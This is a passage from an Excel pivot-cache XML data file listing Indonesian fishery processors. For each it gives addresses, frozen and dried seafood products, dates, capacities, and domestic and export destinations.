    <s v="Ikan Pelagis Beku (Lemuru, Deho, Kembung, Marlin, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="75000"/>
    <s v="Kota Jakarta Utara, Kabupaten Rembang, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22125"/>
    <x v="631"/>
    <s v="PERUM PERIKANAN INDONESIA REMBANG"/>
    <s v="Jl. Dorang No.2, Kel. Tasikagung, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Swanggi, Manyung, Kerapu, Layur, Bawal, Kakap Merah, Jenggot, Rejung, Kurisi)"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="80000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22126"/>
    <x v="631"/>
    <s v="PERUM PERIKANAN INDONESIA REMBANG"/>
    <s v="Jl. Dorang No.2, Kel. Tasikagung, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="22127"/>
    <x v="631"/>
    <s v="PERUM PERIKANAN INDONESIA REMBANG"/>
    <s v="Jl. Dorang No.2, Kel. Tasikagung, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Hasil Budidaya Beku (Bandeng, Patin, Nila)"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22128"/>
    <x v="631"/>
    <s v="PERUM PERIKANAN INDONESIA REMBANG"/>
    <s v="Jl. Dorang No.2, Kel. Tasikagung, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22129"/>
    <x v="631"/>
    <s v="PERUM PERIKANAN INDONESIA REMBANG"/>
    <s v="Jl. Dorang No.2, Kel. Tasikagung, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22130"/>
    <x v="631"/>
    <s v="PERUM PERIKANAN INDONESIA REMBANG"/>
    <s v="Jl. Dorang No.2, Kel. Tasikagung, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Utara, Kabupaten Semarang, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22131"/>
    <x v="631"/>
    <s v="PERUM PERIKANAN INDONESIA REMBANG"/>
    <s v="Jl. Dorang No.2, Kel. Tasikagung, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kabupaten Semarang, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22132"/>
    <x v="631"/>
    <s v="PERUM PERIKANAN INDONESIA REMBANG"/>
    <s v="Jl. Dorang No.2, Kel. Tasikagung, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Beku"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22133"/>
    <x v="594"/>
    <s v="KOPERASI INKA BANTUL VII PROJO MINO"/>
    <s v="Cold Storage Sadeng, Kel. Songbanyu, Kec. Girisubo, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Abalone Kering"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Philippines"/>
  </r>
  <r>
    <n v="22134"/>
    <x v="632"/>
    <s v="PT. BIMA SAKTI INDOMARINE"/>
    <s v="Dusun Sampangan RT 003 RW 001, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Bonito, Makerel, Lemadang, Marlin, Layaran)"/>
    <d v="2021-01-08T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Yogyakarta, Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, Brunei Darussalam, Hong Kong, India, Japan, Korea, Democratic People's Republic of, Malaysia, Pakistan, Philippines, Singapore, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="22135"/>
    <x v="633"/>
    <s v="PT. OCEAN PARADISE FISHERY"/>
    <s v="Jl. Poros Limunjan Gg. Sulawesi RT 019, Kel. Sambaliung, Kec. Sambaliung, Kabupaten Berau&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Udang Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="120000"/>
    <s v="Kabupaten Rembang, Kota Semarang"/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="22140"/>
    <x v="596"/>
    <s v="PT. IROHA SIDAT INDONESIA"/>
    <s v="Jl. Gatot Subroto No.46, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Marlin, Cakalang, Tenggiri)"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Canada, Korea, Republic of, United States"/>
  </r>
  <r>
    <n v="22142"/>
    <x v="634"/>
    <s v="PT. SOUTHERN MARINE PRODUCTS"/>
    <s v="Jl. Brantas KM 2, Kel. Pilang, Kec. Kademangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Surimi Beku"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="1200000"/>
    <s v="Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Mojokerto"/>
    <s v="Canada, Japan, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="22143"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Lencam, Anggoli, Kerapu, Layur, Bawal, Kakap, Kuro, Kurisi, Tonang)"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="2000000"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22144"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Kuwe, Talang-talang, Rejung, Tenggiri)"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22145"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22146"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22147"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="100"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22148"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Lobster Beku"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22149"/>
    <x v="634"/>
    <s v="PT. SOUTHERN MARINE PRODUCTS"/>
    <s v="Jl. Brantas KM 2, Kel. Pilang, Kec. Kademangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Kuniran, Kapas-kapas, Kurisi, Tonang)"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="100"/>
    <m/>
    <s v="Canada, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22150"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Air Tawar Beku (Lele, Gurami, Bandeng, Nila)"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22151"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rajungan Beku"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22152"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Beku"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22153"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Kering"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22154"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Kering (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22155"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22156"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22157"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Asin"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22158"/>
    <x v="636"/>
    <s v="CV. NOVIRA ABADI"/>
    <s v="Jl. T. Nyak Makam No.04, Kel. Le Masen Kayee Adang, Kec. Syiah Kuala, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Bandeng Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan, Malaysia, Philippines, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="22159"/>
    <x v="636"/>
    <s v="CV. NOVIRA ABADI"/>
    <s v="Jl. T. Nyak Makam No.04, Kel. Le Masen Kayee Adang, Kec. Syiah Kuala, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Pelagis Beku (Tongkol, Deho, Kembung, Marlin, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan, Malaysia, Philippines, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="22160"/>
    <x v="636"/>
    <s v="CV. NOVIRA ABADI"/>
    <s v="Jl. T. Nyak Makam No.04, Kel. Le Masen Kayee Adang, Kec. Syiah Kuala, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan, Malaysia, Philippines, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="22161"/>
    <x v="636"/>
    <s v="CV. NOVIRA ABADI"/>
    <s v="Jl. T. Nyak Makam No.04, Kel. Le Masen Kayee Adang, Kec. Syiah Kuala, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya"/>
    <s v="China, Japan, Malaysia, Philippines, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="22162"/>
    <x v="637"/>
    <s v="PT. SARI TUNA MAKMUR"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22163"/>
    <x v="637"/>
    <s v="PT. SARI TUNA MAKMUR"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22164"/>
    <x v="637"/>
    <s v="PT. SARI TUNA MAKMUR"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakap)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22165"/>
    <x v="637"/>
    <s v="PT. SARI TUNA MAKMUR"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Beku (Kuwe, Kerapu, Kakap)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22166"/>
    <x v="637"/>
    <s v="PT. SARI TUNA MAKMUR"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Malalugis, Layang, Cakalang)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22167"/>
    <x v="637"/>
    <s v="PT. SARI TUNA MAKMUR"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Tongkol, Malalugis, Layang, Cakalang)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22168"/>
    <x v="469"/>
    <s v="PT, MUSTIKA MINANUSA AURORA"/>
    <s v="Jl, Buntu Komplek Pelabuhan Perikanan Pantai Tarakan, Kel, Karang Anyar Pantai, Kec, Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Kepiting Masak Beku"/>
    <d v="2020-10-09T00:00:00"/>
    <n v="105000"/>
    <m/>
    <s v="Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22171"/>
    <x v="638"/>
    <s v="NGUDI LESTARI"/>
    <s v="Mendongan, Kel. Bandung, Kec. Playen, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Lanting Rumput Laut"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="3840"/>
    <s v="Kota Surakarta, Kota Semarang, Kabupaten Gunung Kidul, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22172"/>
    <x v="638"/>
    <s v="NGUDI LESTARI"/>
    <s v="Mendongan, Kel. Bandung, Kec. Playen, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Lanting Lele"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="3840"/>
    <s v="Kota Surakarta, Kota Semarang, Kabupaten Gunung Kidul, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22173"/>
    <x v="639"/>
    <s v="PT. IMCD INDONESIA"/>
    <s v="Jl. Pembangunan I No.8, Kel. Batuceper, Kec. Batujaya, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tepung Karagenan"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="71100"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22175"/>
    <x v="595"/>
    <s v="PT. MALUKU PRIMA SUKSES"/>
    <s v="Jl. Trans, Desa Ureng, Kec. Leihitu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Segar"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22176"/>
    <x v="640"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) BENOA"/>
    <s v="Jl. Raya Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Cakalang)"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Jakarta Utara, Kabupaten Banyuwangi, Kabupaten Pasuruan, Kabupaten Jembrana, Kota Denpasar"/>
    <s v="China, Hong Kong, Japan, United States"/>
  </r>
  <r>
    <n v="22177"/>
    <x v="640"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) BENOA"/>
    <s v="Jl. Raya Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Tongkol, Cakalang)"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Jembrana, Kabupaten Tabanan, Kabupaten Klungkung, Kota Denpasar"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22178"/>
    <x v="640"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) BENOA"/>
    <s v="Jl. Raya Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Japan, United States"/>
  </r>
  <r>
    <n v="22179"/>
    <x v="640"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) BENOA"/>
    <s v="Jl. Raya Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Surabaya, Kota Denpasar"/>
    <s v="China, Honduras, Japan, United States"/>
  </r>
  <r>
    <n v="22180"/>
    <x v="641"/>
    <s v="PT. DUNIA MARINE PRODUCTS"/>
    <s v="Jl. Kawasan Industri Makassar 3/K-4B, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Beku"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="145000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22181"/>
    <x v="641"/>
    <s v="PT, DUNIA MARINE PRODUCTS"/>
    <s v="Jl, Kawasan Industri Makassar 3/K-4B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="137200.20000000001"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22182"/>
    <x v="641"/>
    <s v="PT. DUNIA MARINE PRODUCTS"/>
    <s v="Jl. Kawasan Industri Makassar 3/K-4B, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="150"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22183"/>
    <x v="641"/>
    <s v="PT. DUNIA MARINE PRODUCTS"/>
    <s v="Jl. Kawasan Industri Makassar 3/K-4B, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Gulama, Kerapu, Layur, Kakatua, Bawal, Kakap, Malong, Rejung)"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22184"/>
    <x v="641"/>
    <s v="PT. DUNIA MARINE PRODUCTS"/>
    <s v="Jl. Kawasan Industri Makassar 3/K-4B, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Lemuru, Cakalang, Tenggiri)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22185"/>
    <x v="596"/>
    <s v="PT. IROHA SIDAT INDONESIA"/>
    <s v="Jl. Gatot Subroto No.46, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="Japan, Thailand, United States"/>
  </r>
  <r>
    <n v="22187"/>
    <x v="596"/>
    <s v="PT. IROHA SIDAT INDONESIA"/>
    <s v="Jl. Gatot Subroto No.46, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Masak Beku"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22188"/>
    <x v="596"/>
    <s v="PT. IROHA SIDAT INDONESIA"/>
    <s v="Jl. Gatot Subroto No.46, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Masak Beku"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Canada, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="22190"/>
    <x v="596"/>
    <s v="PT. IROHA SIDAT INDONESIA"/>
    <s v="Jl. Gatot Subroto No.46, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="Japan, Thailand, United States"/>
  </r>
  <r>
    <n v="22193"/>
    <x v="596"/>
    <s v="PT. IROHA SIDAT INDONESIA"/>
    <s v="Jl. Gatot Subroto No.46, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Salmon Masak Beku"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22194"/>
    <x v="642"/>
    <s v="PT. CIPTA PREMIO INDONESIA"/>
    <s v="Jl. Raya Lintas Selatan RT 01 RW 01, Kel. Tasikmadu, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Patin Beku"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="47000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22199"/>
    <x v="642"/>
    <s v="PT. CIPTA PREMIO INDONESIA"/>
    <s v="Jl. Raya Lintas Selatan RT 01 RW 01, Kel. Tasikmadu, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tongkol, Deho)"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="22200"/>
    <x v="643"/>
    <s v="PT. ABADI PERMAI"/>
    <s v="Jl. Timor Timur No.5 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-11-09T00:00:00"/>
    <n v="15000"/>
